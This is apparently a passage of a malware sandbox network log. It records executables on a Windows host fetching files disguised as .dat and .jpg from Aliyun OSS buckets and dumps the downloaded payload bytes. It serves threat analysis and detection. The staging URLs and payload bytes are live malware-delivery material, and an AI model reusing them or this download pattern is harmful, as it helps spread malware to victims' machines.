                                                                                2025-01-10 01:26:26 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                                                Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                                                2025-01-10 01:26:26 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                                                Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.54975539.103.20.424435676C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:26:34 UTC111OUTGET /s.dat HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: tjgohh.oss-cn-beijing.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:26:34 UTC559INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:26:34 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 28272
                                                                                Connection: close
                                                                                x-oss-request-id: 6780774AF06ABA3737036A64
                                                                                Accept-Ranges: bytes
                                                                                ETag: "C8492B9F1CBC5D3B0DDE3A43F6A66DBD"
                                                                                Last-Modified: Fri, 10 Jan 2025 01:26:07 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 629849429435170216
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000113
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: yEkrnxy8XTsN3jpD9qZtvQ==
                                                                                x-oss-server-time: 11
                                                                                2025-01-10 01:26:34 UTC3537INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                                                Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                                                2025-01-10 01:26:34 UTC4096INData Raw: 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 92
                                                                                Data Ascii: ##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                                                2025-01-10 01:26:34 UTC4096INData Raw: 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc 3c
                                                                                Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH<
                                                                                2025-01-10 01:26:34 UTC4096INData Raw: 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 0b
                                                                                Data Ascii: JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                                                                2025-01-10 01:26:34 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                                                Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                                                2025-01-10 01:26:34 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                Data Ascii: ,$LDld=5}u]U
                                                                                2025-01-10 01:26:34 UTC4096INData Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed
                                                                                Data Ascii: <EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                                                2025-01-10 01:26:34 UTC159INData Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 26 99 33 1c
                                                                                Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS&3


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.54976639.103.20.424435676C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:26:36 UTC111OUTGET /s.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: tjgohh.oss-cn-beijing.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:26:36 UTC544INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:26:36 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 8299
                                                                                Connection: close
                                                                                x-oss-request-id: 6780774C51FCAD323876F82F
                                                                                Accept-Ranges: bytes
                                                                                ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                                                Last-Modified: Thu, 09 Jan 2025 09:43:14 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 692387538176721524
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000104
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                                                x-oss-server-time: 11
                                                                                2025-01-10 01:26:36 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                2025-01-10 01:26:36 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                                                                Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                                                2025-01-10 01:26:36 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                                                                Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.549982118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:14 UTC114OUTGET /drops.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:15 UTC545INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:15 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 37274
                                                                                Connection: close
                                                                                x-oss-request-id: 67807773716A9C323919F676
                                                                                Accept-Ranges: bytes
                                                                                ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                                Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 9193697774326766004
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                                x-oss-server-time: 5
                                                                                2025-01-10 01:27:15 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                                                Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                                                2025-01-10 01:27:15 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                                                Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                                                2025-01-10 01:27:15 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                                                Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                                                2025-01-10 01:27:15 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                                                Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
                                                                                2025-01-10 01:27:15 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                                                Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
